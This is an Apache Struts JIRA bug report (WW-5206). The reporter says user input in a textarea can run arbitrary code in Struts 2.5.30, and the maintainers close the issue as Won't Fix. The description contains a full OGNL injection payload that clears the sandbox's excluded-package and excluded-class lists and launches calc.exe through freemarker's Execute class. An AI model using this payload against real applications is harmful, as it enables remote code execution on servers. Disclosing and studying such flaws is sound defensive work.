[WW-5206] OGNL execute arbitrary code - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Trivial
Resolution: Won't Fix
Affects Version/s: 2.5.30
Fix Version/s: None
Component/s: Core
Labels:
None

Description

Hi,

I can run arbitrary code with version of struts 2 - 2.5.30.

JSP code :

<s:textarea
label="%{getText('information.message.erreur')}"
id="messageErreurTexte"
name="formInformation.message"
cssClass="input-messageErreur"
value="${pageInformation.message}"
/>

If I write this text in my form input textarea :

%{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))}

Whenever the page is displayed, the binary calc.exe is executed.

My generic struts params :

struts.ognl.allowStaticMethodAccess = true
struts.ognl.expressionMaxLength not set
struts.devMode = false
struts.ui.theme = simple

Is it normal ?

Thanks.

Attachments

Activity

People

Assignee:: Unassigned

Reporter:: Benjamin Lepeigneul

Votes:: 0 Vote for this issue

Watchers:: 4 Start watching this issue

Dates

Created:: 27/Jul/22 14:40

Updated:: 22/Aug/22 11:32

Resolved:: 27/Jul/22 18:54